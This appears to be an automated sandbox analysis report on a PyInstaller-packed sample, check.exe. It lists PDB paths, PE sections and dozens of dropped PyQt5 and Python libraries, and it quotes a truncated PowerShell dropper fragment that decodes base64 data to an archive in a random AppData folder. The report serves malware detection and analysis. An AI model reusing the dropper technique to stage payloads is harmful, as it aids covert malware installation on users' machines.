Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: check.exe, 00000005.00000002.2749724831.00007FF89F26A000.00000002.00000001.01000000.0000001A.sdmp
Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: check.exe, 00000005.00000002.2748572981.00007FF89EDD5000.00000002.00000001.01000000.0000001B.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Core.pdb source: check.exe, 00000005.00000002.2750673646.00007FF89F7A6000.00000002.00000001.01000000.00000012.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtimageformats\plugins\imageformats\qtiff.pdb source: check.exe, 00000004.00000003.2223972781.000001C184424000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\plugins\imageformats\qgif.pdb source: check.exe, 00000004.00000003.2222491102.000001C184424000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_wmi.pdb(('GCTL source: check.exe, 00000004.00000003.2255442707.000001C184425000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtimageformats\plugins\imageformats\qtga.pdb source: check.exe, 00000004.00000003.2223857971.000001C184424000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: check.exe, 00000004.00000003.2254086538.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2763315652.00007FF8BFBA4000.00000002.00000001.01000000.0000000B.sdmp
Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: check.exe, 00000005.00000002.2749724831.00007FF89F26A000.00000002.00000001.01000000.0000001A.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtimageformats\plugins\imageformats\qicns.pdb source: check.exe, 00000004.00000003.2222581886.000001C184424000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: check.exe, 00000004.00000003.2262892198.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2762283867.00007FF8B9843000.00000002.00000001.01000000.00000018.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: check.exe, 00000004.00000003.2254947920.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2762068252.00007FF8B90EB000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: check.exe, 00000004.00000003.2255084714.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2761734389.00007FF8B8C13000.00000002.00000001.01000000.0000001D.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_wmi.pdb source: check.exe, 00000004.00000003.2255442707.000001C184425000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Widgets.pdb source: check.exe, 00000005.00000002.2744275585.00007FF89E59A000.00000002.00000001.01000000.00000023.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\plugins\platforms\qwindows.pdb source: check.exe, 00000005.00000002.2741705628.00007FF89D8B4000.00000002.00000001.01000000.00000026.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\python3.pdb source: check.exe, 00000004.00000003.2259702970.000001C184425000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2735934243.0000029FD7590000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtimageformats\plugins\imageformats\qwbmp.pdb source: check.exe, 00000004.00000003.2224216053.000001C184424000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\libEGL.pdb source: check.exe, 00000004.00000003.2208243247.000001C184424000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\libssl-3.pdb source: check.exe, 00000005.00000002.2748572981.00007FF89EDD5000.00000002.00000001.01000000.0000001B.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: check.exe, 00000005.00000002.2760756443.00007FF8B82EE000.00000002.00000001.01000000.00000019.sdmp

Data Obfuscation

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String(${random_encoded_data});[System.IO.File]::WriteAllBytes(${random_archive_file},${random_decoded_bytes});${random_new_item}=New-Item -ItemType Directory -Path ${random_install_path};tr
Source: VCRUNTIME140.dll.4.dr Static PE information: 0x78BDDED1 [Sat Mar 11 17:01:05 2034 UTC]
Source: MSVCP140.dll.4.dr Static PE information: section name: .didat
Source: Qt5Core.dll.4.dr Static PE information: section name: .qtmimed
Source: VCRUNTIME140.dll.4.dr Static PE information: section name: fothk
Source: VCRUNTIME140.dll.4.dr Static PE information: section name: _RDATA
Source: VCRUNTIME140.dll0.4.dr Static PE information: section name: _RDATA
Source: opengl32sw.dll.4.dr Static PE information: section name: _RDATA
Source: qtuiotouchplugin.dll.4.dr Static PE information: section name: .qtmetad
Source: qsvgicon.dll.4.dr Static PE information: section name: .qtmetad
Source: qgif.dll.4.dr Static PE information: section name: .qtmetad
Source: qicns.dll.4.dr Static PE information: section name: .qtmetad
Source: qico.dll.4.dr Static PE information: section name: .qtmetad
Source: qjpeg.dll.4.dr Static PE information: section name: .qtmetad
Source: qsvg.dll.4.dr Static PE information: section name: .qtmetad
Source: qtga.dll.4.dr Static PE information: section name: .qtmetad
Source: qtiff.dll.4.dr Static PE information: section name: .qtmetad
Source: qwbmp.dll.4.dr Static PE information: section name: .qtmetad
Source: qwebp.dll.4.dr Static PE information: section name: .qtmetad
Source: libcrypto-3.dll.4.dr Static PE information: section name: .00cfg
Source: libssl-3.dll.4.dr Static PE information: section name: .00cfg
Source: python313.dll.4.dr Static PE information: section name: PyRuntim
Source: qminimal.dll.4.dr Static PE information: section name: .qtmetad
Source: qoffscreen.dll.4.dr Static PE information: section name: .qtmetad
Source: qwebgl.dll.4.dr Static PE information: section name: .qtmetad
Source: qwindows.dll.4.dr Static PE information: section name: .qtmetad
Source: qxdgdesktopportal.dll.4.dr Static PE information: section name: .qtmetad
Source: qwindowsvistastyle.dll.4.dr Static PE information: section name: .qtmetad
Source: VCRUNTIME140.dll.6.dr Static PE information: section name: fothk
Source: VCRUNTIME140.dll.6.dr Static PE information: section name: _RDATA
Source: MSVCP140.dll.6.dr Static PE information: section name: .didat
Source: Qt5Core.dll.6.dr Static PE information: section name: .qtmimed
Source: libcrypto-3.dll.6.dr Static PE information: section name: .00cfg
Source: libssl-3.dll.6.dr Static PE information: section name: .00cfg
Source: VCRUNTIME140.dll0.6.dr Static PE information: section name: _RDATA
Source: python313.dll.6.dr Static PE information: section name: PyRuntim
Source: opengl32sw.dll.6.dr Static PE information: section name: _RDATA
Source: qtuiotouchplugin.dll.6.dr Static PE information: section name: .qtmetad
Source: qsvgicon.dll.6.dr Static PE information: section name: .qtmetad
Source: qgif.dll.6.dr Static PE information: section name: .qtmetad
Source: qicns.dll.6.dr Static PE information: section name: .qtmetad
Source: qico.dll.6.dr Static PE information: section name: .qtmetad
Source: qjpeg.dll.6.dr Static PE information: section name: .qtmetad
Source: qsvg.dll.6.dr Static PE information: section name: .qtmetad
Source: qtga.dll.6.dr Static PE information: section name: .qtmetad
Source: qtiff.dll.6.dr Static PE information: section name: .qtmetad
Source: qwbmp.dll.6.dr Static PE information: section name: .qtmetad
Source: qwebp.dll.6.dr Static PE information: section name: .qtmetad
Source: qminimal.dll.6.dr Static PE information: section name: .qtmetad
Source: qoffscreen.dll.6.dr Static PE information: section name: .qtmetad
Source: qwebgl.dll.6.dr Static PE information: section name: .qtmetad
Source: qwindows.dll.6.dr Static PE information: section name: .qtmetad
Source: qxdgdesktopportal.dll.6.dr Static PE information: section name: .qtmetad
Source: qwindowsvistastyle.dll.6.dr Static PE information: section name: .qtmetad
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Code function: 14_2_00007FF89A6BD5E4 push rbx; retn 0000h 14_2_00007FF89A6BD5F5
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe Code function: 22_2_00007FF898C0D5E4 push rbx; retn 0000h 22_2_00007FF898C0D5F5
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe File created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\QtCore.pyd
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe File created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\plugins\platforms\qwindows.dll
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe File created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\QtGui.pyd
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe File created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\QtCore.pyd
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\opengl32sw.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\libcrypto-3.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\imageformats\qjpeg.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\platforms\qminimal.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\imageformats\qjpeg.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\_queue.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\python313.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\VCRUNTIME140.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\MSVCP140_1.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\Qt5Qml.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\plugins\imageformats\qico.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\platforms\qminimal.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\_ctypes.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\_ssl.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\charset_normalizer\md.cp313-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\_decimal.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\_ctypes.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\imageformats\qico.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\Qt5Network.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\imageformats\qtiff.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\select.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\VCRUNTIME140.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\imageformats\qgif.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\QtGui.pydJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\_bz2.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\imageformats\qicns.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\python3.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\select.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\Qt5DBus.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\platforms\qoffscreen.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\_ssl.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\VCRUNTIME140_1.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\unicodedata.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\Qt5Quick.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\Qt5QmlModels.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\Qt5Qml.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\select.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\imageformats\qwbmp.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\_ctypes.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\VCRUNTIME140.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\charset_normalizer\md__mypyc.cp313-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\bin\Qt5WebSockets.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\plugins\platforms\qoffscreen.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\libEGL.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\styles\qwindowsvistastyle.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\platforms\qwebgl.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\bin\Qt5Qml.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\plugins\imageformats\qsvg.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\plugins\imageformats\qtga.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\charset_normalizer\md__mypyc.cp313-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\VCRUNTIME140_1.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\_hashlib.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\iconengines\qsvgicon.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\platformthemes\qxdgdesktopportal.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\_queue.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\iconengines\qsvgicon.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\Qt5Svg.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\imageformats\qgif.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\_lzma.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\_wmi.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\opengl32sw.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\Qt5Widgets.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\libssl-3.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\libGLESv2.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\libcrypto-3.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\platforms\qwindows.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\imageformats\qwbmp.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\imageformats\qwebp.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\_socket.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\libffi-8.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\bin\Qt5QmlModels.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\unicodedata.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\imageformats\qtiff.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\imageformats\qsvg.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\QtWidgets.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\python313.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\d3dcompiler_47.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\libGLESv2.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\Qt5Widgets.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\Qt5DBus.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\bin\MSVCP140.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\platforms\qwebgl.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\_hashlib.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\_ssl.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\bin\d3dcompiler_47.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\plugins\styles\qwindowsvistastyle.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\Qt5Gui.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\Qt5WebSockets.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\_wmi.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\bin\libEGL.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\_lzma.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\VCRUNTIME140.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\Qt5Core.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\_wmi.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\bin\Qt5Network.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\VCRUNTIME140_1.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\bin\Qt5DBus.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\bin\Qt5Svg.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\bin\MSVCP140_1.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\imageformats\qico.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\plugins\platforms\qminimal.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\plugins\imageformats\qicns.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\libssl-3.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\_decimal.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\QtCore.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\sip.cp313-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\imageformats\qtga.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\VCRUNTIME140_1.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\PyQt5\Qt5\plugins\imageformats\qwbmp.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\bin\libEGL.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\VCRUNTIME140_1.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI26042\PyQt5\Qt5\plugins\platforms\qwindows.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\_socket.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI65842\psutil\_psutil_windows.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\UvDdFNOw\check.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\bin\Qt5QmlModels.dllJump to dropped file
